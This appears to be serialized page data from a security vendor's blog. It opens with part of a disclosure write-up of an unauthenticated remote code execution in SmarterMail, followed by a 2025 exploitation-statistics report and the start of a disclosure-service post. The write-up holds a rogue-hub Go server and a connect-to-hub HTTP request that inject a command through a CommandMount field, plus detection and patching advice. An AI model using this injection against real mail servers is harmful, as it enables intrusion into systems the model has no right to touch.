fmt",[1373,19131,59],{"class":1383},[1373,19133,19134],{"class":7297},"Println",[1373,19136,1384],{"class":1383},[1373,19138,183],{"class":1387},[1373,19140,19141],{"class":1391},"Connected",[1373,19143,183],{"class":1387},[1373,19145,11875],{"class":1383},[1373,19147,19148,19150,19152,19155,19157,19159,19161,19164,19167,19170],{"class":1375,"line":4806},[1373,19149,19129],{"class":4640},[1373,19151,59],{"class":1383},[1373,19153,19154],{"class":7297},"Fprint",[1373,19156,1384],{"class":1383},[1373,19158,19097],{"class":4640},[1373,19160,5437],{"class":1383},[1373,19162,19163],{"class":1387}," `",[1373,19165,19166],{"class":1391},"{\"ClusterID\":\"f0e12780-f462-4b51-a7db-149f1d56209c\", \"SharedSecret\":\"vulncheck\", \"TargetHubs\":{\"a\":\"b\"}, \"IsStandby\":false, \"SystemMount\":{\"Enabled\":true,\"ReadOnly\":false,\"MountPath\":\"\u002Fa\",\"CommandMount\":\"dir > C:\\\\pwn\"}, \"SystemAdminUsernames\":[\"poptart\"]}",[1373,19168,19169],{"class":1387},"`",[1373,19171,11875],{"class":1383},[1373,19173,19174],{"class":1375,"line":4817},[1373,19175,1855],{"class":1383},[1373,19177,19178],{"class":1375,"line":4825},[1373,19179,6520],{"emptyLinePlaceholder":237},[1373,19181,19182,19184,19187,19189],{"class":1375,"line":4835},[1373,19183,19088],{"class":1397},[1373,19185,19186],{"class":7297}," main",[1373,19188,7514],{"class":1383},[1373,19190,4765],{"class":1383},[1373,19192,19193,19196,19198,19201,19203,19205,19207,19209,19211,19213],{"class":1375,"line":4843},[1373,19194,19195],{"class":4640},"    
http",[1373,19197,59],{"class":1383},[1373,19199,19200],{"class":7297},"HandleFunc",[1373,19202,1384],{"class":1383},[1373,19204,183],{"class":1387},[1373,19206,14886],{"class":1391},[1373,19208,183],{"class":1387},[1373,19210,5437],{"class":1383},[1373,19212,19091],{"class":4640},[1373,19214,11875],{"class":1383},[1373,19216,19217,19220,19222,19225,19227,19229,19231,19234,19236,19238,19241,19243,19245,19248],{"class":1375,"line":4849},[1373,19218,19219],{"class":4640},"    log",[1373,19221,59],{"class":1383},[1373,19223,19224],{"class":7297},"Fatal",[1373,19226,1384],{"class":1383},[1373,19228,6277],{"class":4640},[1373,19230,59],{"class":1383},[1373,19232,19233],{"class":7297},"ListenAndServe",[1373,19235,1384],{"class":1383},[1373,19237,183],{"class":1387},[1373,19239,19240],{"class":1391},":8082",[1373,19242,183],{"class":1387},[1373,19244,5437],{"class":1383},[1373,19246,19247],{"class":7054}," nil",[1373,19249,16761],{"class":1383},[1373,19251,19252],{"class":1375,"line":4877},[1373,19253,1855],{"class":1383},[18,19255,19256,19257,19259],{},"Simply sending a request to the ",[886,19258,14878],{}," endpoint with the initial hub parameter looks like the following HTTP request:",[1354,19261,19263],{"className":6275,"code":19262,"language":6277,"meta":219,"style":219},"POST \u002Fapi\u002Fv1\u002Fsettings\u002Fsysadmin\u002Fconnect-to-hub HTTP\u002F1.1\nHost: 10.0.0.174:9998\nUser-Agent: vulncheck-ua \nAccept: text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.7\nContent-Type: application\u002Fjson\nContent-Length: 89\n\n\n{\"hubAddress\":\"http:\u002F\u002F10.0.1.10:8082\", \"oneTimePassword\":\"test\", \"nodeName\": 
\"vulncheck\"}\n\n",[886,19264,19265,19278,19287,19299,19307,19315,19324,19328,19332],{"__ignoreMap":219},[1373,19266,19267,19269,19272,19274,19276],{"class":1375,"line":1376},[1373,19268,6946],{"class":4636},[1373,19270,19271],{"class":4640}," \u002Fapi\u002Fv1\u002Fsettings\u002Fsysadmin\u002Fconnect-to-hub ",[1373,19273,6290],{"class":5387},[1373,19275,2180],{"class":4640},[1373,19277,6295],{"class":5467},[1373,19279,19280,19282,19284],{"class":1375,"line":220},[1373,19281,6301],{"class":6300},[1373,19283,4606],{"class":5387},[1373,19285,19286],{"class":1391}," 10.0.0.174:9998\n",[1373,19288,19289,19291,19293,19296],{"class":1375,"line":1266},[1373,19290,6311],{"class":6300},[1373,19292,4606],{"class":5387},[1373,19294,19295],{"class":1391}," vulncheck-ua",[1373,19297,19298],{"class":4640}," \n",[1373,19300,19301,19303,19305],{"class":1375,"line":1852},[1373,19302,7013],{"class":6300},[1373,19304,4606],{"class":5387},[1373,19306,7850],{"class":1391},[1373,19308,19309,19311,19313],{"class":1375,"line":4692},[1373,19310,6391],{"class":6300},[1373,19312,4606],{"class":5387},[1373,19314,7000],{"class":1391},[1373,19316,19317,19319,19321],{"class":1375,"line":4724},[1373,19318,6411],{"class":6300},[1373,19320,4606],{"class":5387},[1373,19322,19323],{"class":1391}," 
89\n",[1373,19325,19326],{"class":1375,"line":4756},[1373,19327,6520],{"emptyLinePlaceholder":237},[1373,19329,19330],{"class":1375,"line":4768},[1373,19331,6520],{"emptyLinePlaceholder":237},[1373,19333,19334,19336,19338,19340,19342,19344,19346,19349,19351,19353,19355,19357,19359,19361,19363,19366,19368,19370,19372,19375,19377,19379,19381,19384,19386],{"class":1375,"line":4792},[1373,19335,9149],{"class":1383},[1373,19337,183],{"class":9152},[1373,19339,14882],{"class":9155},[1373,19341,183],{"class":9152},[1373,19343,4606],{"class":1383},[1373,19345,183],{"class":9173},[1373,19347,19348],{"class":9176},"http:\u002F\u002F10.0.1.10:8082",[1373,19350,183],{"class":9173},[1373,19352,5437],{"class":1383},[1373,19354,4883],{"class":9152},[1373,19356,15350],{"class":9155},[1373,19358,183],{"class":9152},[1373,19360,4606],{"class":1383},[1373,19362,183],{"class":9173},[1373,19364,19365],{"class":9176},"test",[1373,19367,183],{"class":9173},[1373,19369,5437],{"class":1383},[1373,19371,4883],{"class":9152},[1373,19373,19374],{"class":9155},"nodeName",[1373,19376,183],{"class":9152},[1373,19378,4606],{"class":1383},[1373,19380,4883],{"class":9173},[1373,19382,19383],{"class":9176},"vulncheck",[1373,19385,183],{"class":9173},[1373,19387,1855],{"class":1383},[18,19389,19390],{},"Once the server reaches out and processes our dummy JSON data, the injected command runs and the following file is created on disk:",[18,19392,19393],{},[68,19394],{"alt":19395,"src":19396},"SmarterMail ConnectToHub Windows Execution","\u002Fblog\u002Fsmartermail-connecttohub-rce-cve-2026-24423\u002Fsmartermail-windows-execution.png",[18,19398,19399,19400,19402,19403,19406],{},"Defenders should immediately monitor and check logs for interactions with the ",[886,19401,14872],{}," endpoint, which in patched versions will not respond with an HTTP 400 status code and error message in the current build (9511). 
A version number can also be retrieved unauthenticated via the ",[886,19404,19405],{},"\u002Fapi\u002Fv1\u002Flicensing\u002Fabout"," endpoint that can be used for quick validation.",[18,19408,19409],{},"SmarterMail users should update to a fixed build of the product if they have not already done so. VulnCheck is grateful to SmarterTools for their quick response and for confirming the vulnerability had already been independently reported and fixed.",[18,19411,19412,19413,19418],{},"A fully weaponized exploit that can be used across Docker, Linux, and Mac platforms is available to VulnCheck ",[295,19414,19415],{},[47,19416,1245],{"href":1258,"rel":19417},[51]," customers.",[61,19420,202],{"id":201},[18,19422,19423,19424,1246,19429,1255,19433,59],{},"The VulnCheck research team is always on the lookout for new vulnerabilities to analyze and new exploits to curate. For more research like this, see ",[47,19425,19428],{"href":19426,"rel":19427},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fxwiki-cve-2025-24893-eitw",[51],"XWiki CVE-2025-24893 Exploited in the Wild",[47,19430,19432],{"href":13214,"rel":19431},[51],"Making Serialization Gadgets By Hand - .NET",[47,19434,19437],{"href":19435,"rel":19436},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Ffortinet-forti-web-exploitation-hits-silently-patched-vulnerability",[51],"Fortinet FortiWeb Exploitation Hits Silently Patched Vulnerability",[18,19439,1228,19440,1234,19443,1240,19446,1246,19449,1255,19452,1260],{},[47,19441,1233],{"href":10806,"rel":19442},[51],[47,19444,1239],{"href":1237,"rel":19445},[51],[47,19447,1245],{"href":1243,"rel":19448},[51],[47,19450,1251],{"href":1249,"rel":19451},[51],[47,19453,216],{"href":1258,"rel":19454},[51],[2901,19456,19457],{},"html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sKvfc, html code.shiki 
.sKvfc{--shiki-light:#E2931D;--shiki-light-text-decoration:inherit;--shiki-default:#6F42C1;--shiki-default-text-decoration:inherit;--shiki-dark:#B392F0;--shiki-dark-text-decoration:inherit;--shiki-sepia:#A6E22E;--shiki-sepia-text-decoration:underline}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sP9PO, html code.shiki .sP9PO{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#E6DB74}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: 
var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .shWJe, html code.shiki .shWJe{--shiki-light:#F76D47;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sHsBP, html code.shiki 
.sHsBP{--shiki-light:#E53935;--shiki-default:#22863A;--shiki-dark:#85E89D;--shiki-sepia:#F92672}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sQqfL, html code.shiki .sQqfL{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#F8F8F2}html pre.shiki code .s8HiA, html code.shiki .s8HiA{--shiki-light:#FF5370;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sTNss, html code.shiki .sTNss{--shiki-light:#9C3EDA;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sSsL9, html code.shiki .sSsL9{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sQHqT, html code.shiki 
.sQHqT{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}",{"title":219,"searchDepth":220,"depth":220,"links":19459},[19460,19463],{"id":14865,"depth":220,"text":14866,"children":19461},[19462],{"id":4540,"depth":1266,"text":4541},{"id":201,"depth":220,"text":202},"2026-01-26","Exploring an unauthenticated remote code execution in the SmarterTools SmarterMail server via the ConnectToHub mounting functionality.",{"slug":19467},"smartermail-connecttohub-rce-cve-2026-24423","\u002Fblog\u002Fsmartermail-connecttohub-rce-cve-2026-24423",{"title":10344,"description":19465},"blog\u002Fsmartermail-connecttohub-rce-cve-2026-24423",[242,1281],"tQEXRHe9QEv0bTc16JE53w9Sfs6wMHKFRf0HfRZswKA",{"id":19474,"title":19475,"articles":19476,"authors":19503,"body":19505,"date":19481,"description":19750,"extension":234,"image":7,"link":7,"meta":19751,"navigation":237,"path":19753,"seo":19754,"series":7,"stem":19755,"subtype":7,"tags":19756,"__hash__":19757},"blog\u002Fblog\u002Fstate-of-exploitation-2026.md","VulnCheck State of Exploitation 2026",[19477,19482,19487,19490,19494,19499],{"title":19478,"source":19479,"link":19480,"date":19481},"Attacks Target Freshly Patched, Critical Fortinet Flaws","BankInfoSecurity","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fattacks-target-freshly-patched-critical-fortinet-flaws-a-30575","2026-01-21",{"title":19483,"source":19484,"link":19485,"date":19486},"Zero-Day Exploits Surge, Nearly 30% of Flaws Attacked Before Disclosure","Infosecurity Magazine","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fzeroday-exploits-surge-vulncheck\u002F","2026-01-22",{"title":19488,"source":19479,"link":19489,"date":19486},"Breach Roundup: DOGE Uploaded Social Security Data to 
Cloud","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fbreach-roundup-doge-uploaded-social-security-data-to-cloud-a-30586",{"title":19491,"source":3495,"link":19492,"date":19493},"Risky Bulletin: Improperly patched bug exploited again in Fortinet firewalls","https:\u002F\u002Frisky.biz\u002Frisky-bulletin-improperly-patched-bug-exploited-again-in-fortinet-firewalls\u002F","2026-01-23",{"title":19495,"source":19496,"link":19497,"date":19498},"Bond Investors May Be Underpricing Cyber Risk As AI Speeds Up Attacks","Forbes","https:\u002F\u002Fwww.forbes.com\u002Fsites\u002Fdaraabasiita\u002F2026\u002F03\u002F07\u002Fbond-investors-may-be-underpricing-cyber-risk-as-ai-speeds-up-attacks\u002F","2026-03-07",{"title":19500,"source":3486,"link":19501,"date":19502},"CISA mulls new three-day remediation deadline for critical flaws","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F4167422\u002Fcisa-mulls-new-three-day-remediation-deadline-for-critical-flaws.html","2026-05-05",[19504],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":19506,"toc":19737},[19507,19513,19522,19525,19528,19533,19583,19595,19599,19603,19606,19610,19615,19622,19626,19631,19634,19637,19641,19646,19649,19652,19656,19661,19664,19668,19673,19681,19685,19690,19693,19697,19702,19705,19709,19712,19716,19719,19726,19728,19730,19732],[18,19508,19509],{},[68,19510],{":width":10862,"alt":19511,"src":19512},"1H-2025 Exploited Vulnerabilities","\u002Fblog\u002Fstate-of-exploitation-2026\u002F2025-exploitation-timeline.png",[18,19514,19515,19516,19521],{},"In 2025, VulnCheck identified 884 Known Exploited Vulnerabilities (KEVs) for which evidence of exploitation was observed for the first time. By using the CVE publication date as a proxy for when defenders often gain awareness of a vulnerability, we can better understand how quickly exploitation follows disclosure and awareness. 
Our analysis shows that 28.96% of KEVs in 2025 were exploited on or before the day their CVE was published, an increase from the 23.6% observed in our ",[47,19517,19520],{"href":19518,"rel":19519},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002F2024-exploitation-trends",[51],"2024 trends in exploitation report",", highlighting the continued prevalence of both zero-day[1] and n-day exploitation. This reinforces the urgency for organizations to act quickly on newly disclosed vulnerabilities while continuing to reduce long-standing vulnerability backlogs.",[18,19523,19524],{},"Throughout 2025, exploitation evidence was first reported by over 100 unique organizations, including security researchers, cybersecurity vendors, and software suppliers. Attackers continued to focus on internet-facing and widely deployed technologies, while also opportunistically exploiting a long tail of enterprise software, hardware, and emerging technology such as AI.",[18,19526,19527],{},"These trends demonstrate that exploitation speed remains consistently high year over year, and that defenders must prioritize visibility into exploited vulnerabilities with timely remediation in order to keep pace with attackers.",[18,19529,19530],{},[295,19531,19532],{},"Key takeaways from VulnCheck’s analysis of KEVs in 2025 include:",[22,19534,19535,19541,19547,19553,19559,19566,19573,19576],{},[25,19536,19537,19540],{},[295,19538,19539],{},"884 KEVs"," were identified with first-time exploitation evidence during 2025 and added to VulnCheck KEV.",[25,19542,19543,19546],{},[295,19544,19545],{},"28.96% of KEVs"," showed evidence of exploitation on or before the day the CVE was published, underscoring the persistence of rapid exploitation.",[25,19548,19549,19552],{},[295,19550,19551],{},"118 unique sources"," were first to publicly report exploitation activity, with hundreds more contributing corroborating evidence across the ecosystem.",[25,19554,19555,19558],{},[295,19556,19557],{},"Network edge 
devices",", including firewalls, VPNs, and proxies, were the most frequently targeted technologies, followed by content management systems and open source software.",[25,19560,19561,19562,19565],{},"Exploitation activity spanned ",[295,19563,19564],{},"hundreds of vendors and products",", reflecting a broader coverage of enterprise technologies than is represented in public KEV catalogs alone.",[25,19567,19568,19569,19572],{},"VulnCheck identified exploitation evidence for KEVs ",[295,19570,19571],{},"significantly earlier than CISA KEV in the majority of cases",", often by days, months, or even years.",[25,19574,19575],{},"Ransomware attribution continued to lag behind initial exploitation disclosure, suggesting that attribution for vulnerabilities exploited in 2025 will continue to grow as additional research is published.",[25,19577,19578,19579,19582],{},"Time-to-exploitation patterns in 2025 remained ",[295,19580,19581],{},"highly consistent with 2024",", indicating stable and sustained attacker behavior.",[18,19584,19585,19586,19589,19590,59],{},"This research was completed using ",[47,19587,1233],{"href":1231,"rel":19588},[51]," which is available as a free community service. During 2025 we expanded VulnCheck KEV to now include ",[47,19591,19594],{"href":19592,"rel":19593},"https:\u002F\u002Fdocs.vulncheck.com\u002Falerts",[51],"E-mail and Slack alerting",[61,19596,19598],{"id":19597},"_2025-kev-exploitation-timeline","2025 KEV Exploitation Timeline",[18,19600,19601],{},[68,19602],{":width":10862,"alt":19511,"src":19512},[18,19604,19605],{},"During 2025, VulnCheck identified exploitation activity for 884 Known Exploited Vulnerabilities (KEVs) that had no evidence of exploitation prior to 2025. To better understand how quickly vulnerabilities are exploited, we use the CVE publication date as a reference point for when defenders typically first gain visibility into a vulnerability. 
Our analysis shows that 28.96% of the KEVs identified in 2025 were exploited on or before the day their CVE was published, underscoring the speed at which threat actors operate, often exploiting vulnerabilities before public disclosure or CVE issuance occurs. This highlights the need to address vulnerabilities early in their lifecycle, when exploitation risk is highest, while continuing to remediate older vulnerabilities that persist.",[61,19607,19609],{"id":19608},"first-reporter-of-exploitation-in-2025","First Reporter of Exploitation in 2025",[18,19611,19612],{},[68,19613],{":width":10862,"alt":19511,"src":19614},"\u002Fblog\u002Fstate-of-exploitation-2026\u002F2025-exploitation-source.png",[18,19616,19617,19618,59],{},"By analyzing source-level evidence of exploitation, we identified which organizations publicly disclosed exploitation evidence first. In 2025, we observed 118 unique sources that were the first reporters of exploitation activity, with hundreds of additional sources contributing corroborating evidence. Transparency in exploitation disclosure is critical, as it enables consumers to better understand who first reported exploitation and to assess the level of trust they place in each source. Shadowserver remained the leading source for first-to-report exploitation evidence. The most notable increases in sources that were first to report KEVs included CrowdSec, which was onboarded as a new source and scaled significantly in 2025, and VulnCheck, following the launch of ",[47,19619,19621],{"href":281,"rel":19620},[51],"VulnCheck Canary Intelligence",[61,19623,19625],{"id":19624},"top-targeted-technologies","Top Targeted Technologies",[18,19627,19628],{},[68,19629],{":width":10862,"alt":19511,"src":19630},"\u002Fblog\u002Fstate-of-exploitation-2026\u002Ftop-targeted-technologies-2025.png",[18,19632,19633],{},"Looking at the top technologies being targeted, network edge devices such as firewalls, VPNs, and proxies top the list. 
This is not surprising, as they are internet-facing devices that often serve as a jumping-off point into an enterprise environment or home network. Content management systems, largely dominated by the WordPress ecosystem, are also frequent targets because they are commonly exposed to the internet. Open source software ranked third in 2025, followed by server software and operating systems such as Microsoft Windows, Linux, Apple, and Android.",[18,19635,19636],{},"However, exploitation spans a broad range of enterprise technologies and extends beyond these categories to include hardware devices, most often camera systems, as well as file sharing platforms, developer tools, device management systems, backup solutions, security tools, desktop applications, AI systems, ICS and OT environments, email platforms, virtualization technologies, identity systems, browsers, mobile applications, cloud services, and more. Threat actors are opportunistic, leveraging both older, well-known vulnerabilities and newly disclosed flaws to access systems and establish footholds across the enterprise.",[61,19638,19640],{"id":19639},"top-targeted-technologies-time-from-cve-to-exploitation-evidence","Top Targeted Technologies - Time from CVE to Exploitation Evidence",[18,19642,19643],{},[68,19644],{":width":10862,"alt":19511,"src":19645},"\u002Fblog\u002Fstate-of-exploitation-2026\u002F2025-top-ten-timeline.png",[18,19647,19648],{},"Breaking out the top ten targeted technologies and examining exploitation timelines relative to CVE issuance provides additional insight into the relationship between exploitation and disclosure.",[18,19650,19651],{},"Operating systems top the chart, likely because vendors such as Microsoft, Apple, and Google (Android) frequently disclose evidence of exploitation alongside their security advisories. This year, we spent considerable time issuing CVEs for vulnerabilities in camera systems, which fall under the hardware category. 
This likely reflects the relative immaturity of vulnerability disclosure and issuance practices among hardware manufacturers. While each category could warrant its own dedicated research project, this analysis provides defenders with a clearer sense of how quickly they need to prioritize patching for each technology.",[61,19653,19655],{"id":19654},"how-did-vulncheck-kev-compare-with-cisa-kev-in-2025","How Did VulnCheck KEV compare with CISA KEV in 2025?",[18,19657,19658],{},[68,19659],{":width":10862,"alt":19511,"src":19660},"\u002Fblog\u002Fstate-of-exploitation-2026\u002Fvulncheck-cisa-kev.png",[18,19662,19663],{},"During the year, VulnCheck identified 884 unique KEVs across 518 vendors and 672 products, while CISA added 245 KEVs across 99 vendors and 146 products, most of which are high impact and pervasive across the federal landscape. One of the biggest differences is the volume of vendors and projects covered. Additionally, VulnCheck added evidence to its KEVs more than 85 percent of the time, often predating CISA by days, months, or even years.",[61,19665,19667],{"id":19666},"exploitation-of-real-vulnerable-hosts-not-on-cisa-kev","Exploitation of Real Vulnerable Hosts, not on CISA KEV",[18,19669,19670],{},[68,19671],{":width":10862,"alt":19511,"src":19672},"\u002Fblog\u002Fstate-of-exploitation-2026\u002Fcanaries-not-on-cisa-kev.png",[18,19674,19675,19676,19680],{},"In October 2025, we added exploitation indicators to VulnCheck KEV sourced from ",[47,19677,19679],{"href":281,"rel":19678},[51],"VulnCheck's Canary Intelligence"," service. When exploitation of a vulnerability is detected against a real vulnerable host that we have deployed, an indicator is added to VulnCheck KEV. 
This provides valuable insight into technologies where exploitation has been observed on real-world systems, but the vulnerabilities are not listed in CISA KEV.",[61,19682,19684],{"id":19683},"ransomware-attribution-over-time","Ransomware Attribution Over time",[18,19686,19687],{},[68,19688],{":width":10862,"alt":19511,"src":19689},"\u002Fblog\u002Fstate-of-exploitation-2026\u002Fkev-ransomware-comparison.png",[18,19691,19692],{},"The spike observed in 2021 and 2022 is likely a direct result of the initial release of CISA’s Known Exploited Vulnerabilities (KEV) catalog, which included early additions and associated ransomware attribution. We are now likely seeing stabilization in the number of vulnerabilities used in ransomware campaigns; however, because ransomware attribution is often delayed relative to initial exploitation disclosures, we expect attribution for vulnerabilities known to be exploited in 2025 to continue increasing as additional research is published.",[61,19694,19696],{"id":19695},"how-does-the-2025-exploitation-timeline-compare-with-2024","How Does the 2025 Exploitation Timeline Compare with 2024?",[18,19698,19699],{},[68,19700],{":width":10862,"alt":19511,"src":19701},"\u002Fblog\u002Fstate-of-exploitation-2026\u002F2024-2025-timeline.png",[18,19703,19704],{},"Time to exploitation remained highly consistent between 2024 and 2025, with only minor deviations, indicating consistent exploitation activity in known exploited vulnerabilities across both years.",[61,19706,19708],{"id":19707},"summary-of-vulncheck-state-of-exploitation-2026","Summary of VulnCheck State of Exploitation - 2026",[18,19710,19711],{},"2025 reinforces the reality that exploitation speed remains a defining challenge for defenders. 
With nearly 900 KEVs first observed as exploited during the year, sustained prevalence of zero-day[1] and n-day exploitation activity, and continued targeting of internet-facing and widely deployed enterprise technologies, organizations face little margin for delayed response. While time-to-exploitation patterns remained consistent with 2024, the scale and breadth of affected vendors, products, and technologies continue to expand. Maintaining strong vulnerability management practices, prioritizing trusted exploitation intelligence, and monitoring beyond the CISA KEV catalog remain critical to reducing exposure and staying ahead of adversaries.",[61,19713,19715],{"id":19714},"considerations-for-this-report","Considerations For This Report",[18,19717,19718],{},"[1] Not all KEVs being exploited on the same day of CVE issuance are Zero Days.",[18,19720,19721,19722,59],{},"[2] The CVEs for 81 of the KEVs that were identified as being exploited in the wild during 2025 were published by VulnCheck through the VulnCheck research team, partnership with ShadowServer, and from our ",[47,19723,19725],{"href":2999,"rel":19724},[51],"report a vulnerability service",[61,19727,202],{"id":201},[18,19729,205],{},[18,19731,208],{},[18,19733,211,19734,217],{},[47,19735,216],{"href":214,"rel":19736},[51],{"title":219,"searchDepth":220,"depth":220,"links":19738},[19739,19740,19741,19742,19743,19744,19745,19746,19747,19748,19749],{"id":19597,"depth":220,"text":19598},{"id":19608,"depth":220,"text":19609},{"id":19624,"depth":220,"text":19625},{"id":19639,"depth":220,"text":19640},{"id":19654,"depth":220,"text":19655},{"id":19666,"depth":220,"text":19667},{"id":19683,"depth":220,"text":19684},{"id":19695,"depth":220,"text":19696},{"id":19707,"depth":220,"text":19708},{"id":19714,"depth":220,"text":19715},{"id":201,"depth":220,"text":202},"Key Trends and Findings from 2025’s Known Exploited 
Vulnerabilities",{"slug":19752},"state-of-exploitation-2026","\u002Fblog\u002Fstate-of-exploitation-2026",{"title":19475,"description":19750},"blog\u002Fstate-of-exploitation-2026",[1280,1279],"CFNgriapfPqLnvoX4s8LAzQUJhJ2YpIQhjhI0mQU7-I",{"id":19759,"title":19760,"articles":7,"authors":19761,"body":19768,"date":19987,"description":19988,"extension":234,"image":7,"link":7,"meta":19989,"navigation":237,"path":19991,"seo":19992,"series":7,"stem":19993,"subtype":7,"tags":19994,"__hash__":19995},"blog\u002Fblog\u002Freport-a-vulnerability.md","How to Report a Security Vulnerability to VulnCheck",[19762,19767],{"name":19763,"avatar":19764,"link":19765,"linkName":19766},"Wade Sparks","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U090MLLSBBL-d5b69f2a49e7-192","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fwadesparksvt\u002F","in\u002Fwadesparksvt\u002F",{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":19769,"toc":19975},[19770,19773,19776,19779,19793,19796,19800,19803,19807,19810,19822,19826,19829,19832,19858,19861,19867,19871,19874,19882,19886,19889,19893,19896,19900,19903,19907,19910,19944,19948,19956,19958],[18,19771,19772],{},"Start reporting your vulnerabilities through an organization equipped to handle Coordinated Vulnerability Disclosure (CVD) AND CVE assignment on your behalf. VulnCheck is here to service you, and we invite you to give it a whirl.",[18,19774,19775],{},"Security researchers often encounter obstacles when attempting to disclose vulnerabilities independently, whether discovered firsthand or observed in the wild. 
